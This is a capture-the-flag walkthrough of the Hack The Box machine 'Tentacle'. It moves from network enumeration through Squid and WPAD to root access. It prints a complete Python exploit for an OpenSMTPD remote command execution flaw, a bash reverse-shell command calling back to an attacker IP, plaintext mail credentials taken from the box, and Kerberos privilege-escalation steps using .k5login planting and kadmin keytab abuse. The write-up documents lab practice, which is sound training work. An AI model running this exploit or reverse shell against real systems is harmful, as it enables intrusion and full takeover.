About
Tentacle | |
---|---|
IP | 10.129.108.83 |
OS | Linux |
Difficulty | Hard |
nmap
└─$ nmap -Pn -sV -sC -p- -oA Tentacle 10.129.109.74
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-20 05:56 EDT
Stats: 0:00:23 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 0.36% done
Stats: 0:01:10 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 1.44% done; ETC: 07:19 (1:21:08 remaining)
Stats: 0:22:30 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 68.83% done; ETC: 06:29 (0:10:11 remaining)
Stats: 0:22:30 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 68.83% done; ETC: 06:29 (0:10:12 remaining)
Nmap scan report for 10.129.109.74
Host is up (0.81s latency).
Not shown: 65530 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 8d:dd:18:10:e5:7b:b0:da:a3:fa:14:37:a7:52:7a:9c (RSA)
| 256 f6:a9:2e:57:f8:18:b6:f4:ee:03:41:27:1e:1f:93:99 (ECDSA)
|_ 256 04:74:dd:68:79:f4:22:78:d8:ce:dd:8b:3e:8c:76:3b (ED25519)
53/tcp open domain ISC BIND 9.11.20 (RedHat Enterprise Linux 8)
| dns-nsid:
|_ bind.version: 9.11.20-RedHat-9.11.20-5.el8
88/tcp open kerberos-sec MIT Kerberos (server time: 2021-03-20 10:31:34Z)
3128/tcp open http-proxy Squid http proxy 4.11
|_http-server-header: squid/4.11
|_http-title: ERROR: The requested URL could not be retrieved
9090/tcp closed zeus-admin
Service Info: Host: REALCORP.HTB; OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:8
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1798.99 seconds
Port 3128
We are met with an error page stating the following:
ERROR
The requested URL could not be retrieved
The following error was encountered while trying to retrieve the URL: /
*Invalid URL*
Some aspect of the requested URL is incorrect.
Some possible problems are:
*Missing or incorrect access protocol (should be "http://" or similar)
*Missing hostname
*Illegal double-escape in the URL-Path
*Illegal character in hostname; underscores are not allowed.
Your cache administrator is j.nakazawa@realcorp.htb.
---
Generated Sat, 20 Mar 2021 10:46:32 GMT by srv01.realcorp.htb (squid/4.11)
Out of this we gain two pieces of information:
- j.nakazawa@realcorp.htb
- srv01.realcorp.htb
The email of the administrator which may come in handy later for a login, and the server which is hosting this site.
DNS Enumeration
Given we only have domains to work with, we decide to do some DNS enumeration.
dig
❯ dig realcorp.htb
; <<>> DiG 9.10.6 <<>> realcorp.htb
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 50617
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;realcorp.htb. IN A
;; AUTHORITY SECTION:
. 60 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2021032100 1800 900 604800 86400
;; Query time: 11 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Sun Mar 21 16:44:47 AEDT 2021
;; MSG SIZE rcvd: 105
gobuster dns
❯ ~ gobuster dns -d realcorp.htb -r 10.10.10.224:53 -i -w Documents/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Domain: realcorp.htb
[+] Threads: 10
[+] Resolver: 10.10.10.224:53
[+] Show IPs: true
[+] Timeout: 1s
[+] Wordlist: Documents/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
===============================================================
2021/04/16 18:50:54 Starting gobuster in DNS enumeration mode
===============================================================
2021/04/16 18:50:56 [-] Unable to validate base domain: realcorp.htb (lookup realcorp.htb on 127.0.0.1:53: no such host)
Found: ns.realcorp.htb [10.197.243.77]
Found: proxy.realcorp.htb [10.197.243.77]
Found: wpad.realcorp.htb [10.197.243.31]
DNS enumeration was a success. We have a few different subdomains to go through. To make accessing these subdomains and IP addresses easier, we need to setup a proxychains
.
proxychains
Setting up the proxychains
configuration file as below using the IP addresses we got above:
[ProxyList]
# HTB: tentacle
http 10.10.10.224 3128
http 127.0.0.1 3128
http 10.197.243.77 3128
wpad
Now that we can access the subdomains previously found we vist wpad.realcorp.htb
. For context, WPAD stands for Web Proxy Auto-Discovery Protocol.
From Wikipedia:
The Web Proxy Auto-Discovery (WPAD) Protocol is a method used by clients to locate the URL of a configuration file using DHCP and/or DNS discovery methods. Once detection and download of the configuration file is complete, it can be executed to determine the proxy for a specified URL.
Given this we curl
for http://wpad.realcorp.htb/wpad.dat
:
$proxychains curl http://wpad.realcorp.htb/wpad.dat
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-10.10.10.224:3128-<>-127.0.0.1:3128-<>-10.197.243.77:3128-<><>-10.197.243.31:80-<><>-OK
function FindProxyForURL(url, host) {
if (dnsDomainIs(host, "realcorp.htb"))
return "DIRECT";
if (isInNet(dnsResolve(host), "10.197.243.0", "255.255.255.0"))
return "DIRECT";
if (isInNet(dnsResolve(host), "10.241.251.0", "255.255.255.0"))
return "DIRECT";
return "PROXY proxy.realcorp.htb:3128";
}
10.241.251.0
We have already enumerated the 10.197.243.0
networking, so we are going to take a look at the other IP address in the wpad.dat
file.
proxychains nmap -sT --min-rate 2500 -Pn 10.241.251.0/24
Which gave us: 10.241.251.113
proxychains nmap -sT -sC -sV --min-rate 2500 -Pn 10.241.251.113
PORT STATE SERVICE VERSION
25/tcp open smtp OpenSMTPD
| smtp-commands: smtp.realcorp.htb Hello nmap.scanme.org [10.241.251.1], pleased to meet you, 8BITMIME, ENHANCEDSTATUSCODES, SIZE 36700160, DSN, HELP,
|_ 2.0.0 This is OpenSMTPD 2.0.0 To report bugs in the implementation, please contact bugs@openbsd.org 2.0.0 with full details 2.0.0 End of HELP info
Service Info: Host: smtp.realcorp.htb
SMTP Exploit
Google-fu reveals: https://blog.firosolutions.com/exploits/opensmtpd-remote-vulnerability/
import socket, time
import sys
if len(sys.argv) < 4:
print("usage: getShell.py <host> <port> <command>")
exit()
HOST = sys.argv[1]
PORT = int(sys.argv[2])
rev_shell_cmd = sys.argv[3]
payload = b"""\r\n
#0\r\n
#1\r\n
#2\r\n
#3\r\n
#4\r\n
#5\r\n
#6\r\n
#7\r\n
#8\r\n
#9\r\n
#a\r\n
#b\r\n
#c\r\n
#d\r\n
""" + rev_shell_cmd.encode() + b"""
.
"""
for res in socket.getaddrinfo(HOST, PORT, socket.AF_UNSPEC, socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
try:
s = socket.socket(af, socktype, proto)
except OSError as msg:
s = None
continue
try:
s.connect(sa)
except OSError as msg:
s.close()
s = None
continue
break
if s is None:
print('could not open socket')
sys.exit(1)
with s:
data = s.recv(1024)
print('Received', repr(data))
time.sleep(1)
print('SENDING HELO')
s.send(b"helo test.com\r\n")
data = s.recv(1024)
print('RECIEVED', repr(data))
s.send(b"MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>\r\n")
time.sleep(1)
data = s.recv(1024)
print('RECIEVED', repr(data))
s.send(b"RCPT TO:<j.nakazawa@realcorp.htb>\r\n")
data = s.recv(1024)
print('RECIEVED', repr(data))
s.send(b"DATA\r\n")
data = s.recv(1024)
print('RECIEVED', repr(data))
s.send(payload)
data = s.recv(1024)
print('RECIEVED', repr(data))
s.send(b"QUIT\r\n")
data = s.recv(1024)
print('RECIEVED', repr(data))
print("Exploited Check you netcat :D")
s.close()
Exploit using:
proxychains python3 getShell.py 10.241.251.113 25 'bash -c "exec bash -i &> /dev/tcp/10.10.14.9/5050 <&1"'
and we get:
$nc -lvp 5050
Listening on 0.0.0.0 5050
Connection received on 10.10.10.224 49024
bash: cannot set terminal process group (17): Inappropriate ioctl for device
bash: no job control in this shell
root@smtp:~#
SMTP to User
We go to the home directory of our user, j.nakazawa
:
root@smtp:/home/j.nakazawa# ls -la
ls -la
total 16
drwxr-xr-x. 1 j.nakazawa j.nakazawa 59 Dec 9 12:31 .
drwxr-xr-x. 1 root root 24 Dec 8 10:56 ..
lrwxrwxrwx. 1 root root 9 Dec 9 12:31 .bash_history -> /dev/null
-rw-r--r--. 1 j.nakazawa j.nakazawa 220 Apr 18 2019 .bash_logout
-rw-r--r--. 1 j.nakazawa j.nakazawa 3526 Apr 18 2019 .bashrc
-rw-------. 1 j.nakazawa j.nakazawa 476 Dec 8 19:12 .msmtprc
-rw-r--r--. 1 j.nakazawa j.nakazawa 807 Apr 18 2019 .profile
lrwxrwxrwx. 1 root root 9 Dec 9 12:31 .viminfo -> /dev/null
root@smtp:/home/j.nakazawa# cat .msmtprc
cat .msmtprc
# Set default values for all following accounts.
defaults
auth on
tls on
tls_trust_file /etc/ssl/certs/ca-certificates.crt
logfile /dev/null
# RealCorp Mail
account realcorp
host 127.0.0.1
port 587
from j.nakazawa@realcorp.htb
user j.nakazawa
password sJB}RM>6Z~64_
tls_fingerprint C9:6A:B9:F6:0A:D4:9C:2B:B9:F6:44:1F:30:B8:5E:5A:D8:0D:A5:60
# Set a default account
account default : realcorp
Unfortunately for us the above credentials do not work instantly over ssh
.
We need to generate a kerberos
ticket in order to login as j.nakazawa
.
Kerberos
-
Installation:
sudo apt install krb5-user
-
Modify
/etc/hosts
:10.10.10.224 srv01.realcorp.htb
-
Modify
/etc/krb5.conf
:[libdefaults] default_realm = REALCORP.HTB [realms] REALCORP.HTB = { kdc = 10.10.10.224
-
Ticket generation, use
sJB}RM>6Z~64_
as the password:kinit j.nakazawa
-
Login:
ssh j.nakazawa@10.10.10.224
user.txt
[j.nakazawa@srv01 ~]$ ls
user.txt
[j.nakazawa@srv01 ~]$ cat user.txt
c78abea6075164605c634d08c460bf2c
User to Admin
Through basic enumeration we come across the following:
[j.nakazawa@srv01 ~]$ cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
* * * * * admin /usr/local/bin/log_backup.sh
Viewing the log_backup.sh
:
[j.nakazawa@srv01 ~]$ cat /usr/local/bin/log_backup.sh
#!/bin/bash
/usr/bin/rsync -avz --no-perms --no-owner --no-group /var/log/squid/ /home/admin/
cd /home/admin
/usr/bin/tar czf squid_logs.tar.gz.`/usr/bin/date +%F-%H%M%S` access.log cache.log
/usr/bin/rm -f access.log cache.log
This script is backing up everything from /var/log/squid
to /home/admin
. Whilst we can’t access /var/log/squid
directly, we can copy a file into that directory which will be passed to /home/admin
.
cd /tmp
vim .k5login
j.nakazawa@REALCORP.HTB
:wq
cp .k5login /var/log/squid
From here we are able to login as admin
: ssh admin@srv01.realcorp.htb
Admin to Root
[admin@srv01 ~]$ klist -k /etc/krb5.keytab
Keytab name: FILE:/etc/krb5.keytab
KVNO Principal
---- --------------------------------------------------------------------------
2 host/srv01.realcorp.htb@REALCORP.HTB
2 host/srv01.realcorp.htb@REALCORP.HTB
2 host/srv01.realcorp.htb@REALCORP.HTB
2 host/srv01.realcorp.htb@REALCORP.HTB
2 host/srv01.realcorp.htb@REALCORP.HTB
2 kadmin/changepw@REALCORP.HTB
2 kadmin/changepw@REALCORP.HTB
2 kadmin/changepw@REALCORP.HTB
2 kadmin/changepw@REALCORP.HTB
2 kadmin/changepw@REALCORP.HTB
2 kadmin/admin@REALCORP.HTB
2 kadmin/admin@REALCORP.HTB
2 kadmin/admin@REALCORP.HTB
2 kadmin/admin@REALCORP.HTB
2 kadmin/admin@REALCORP.HTB
kadmin -k -t /etc/krb5.keytab -p kadmin/admin@REALCORP.HTB
add_principal root@REALCORP.HTB
kadmin: add_principal root@REALCORP.HTB
No policy specified for root@REALCORP.HTB; defaulting to no policy
Enter password for principal "root@REALCORP.HTB":
Re-enter password for principal "root@REALCORP.HTB":
Principal "root@REALCORP.HTB" created.
[admin@srv01 ~]$ ksu root
WARNING: Your password may be exposed if you enter it here and are logged
in remotely using an unsecure (non-encrypted) channel.
Kerberos password for root@REALCORP.HTB: :
Authenticated root@REALCORP.HTB
Account root: authorization for root@REALCORP.HTB successful
[Last failed login: Sat Jan 30 15:25:07 GMT 2021 from 10.10.14.128 on ssh:notty]
[There was 1 failed login attempt since the last successful login.]
Changing uid to root (0)
[root@srv01 admin]# whoami && cat /root/root.txt
root
3b69371ab6b9677313f9ac1fe2c8c7d8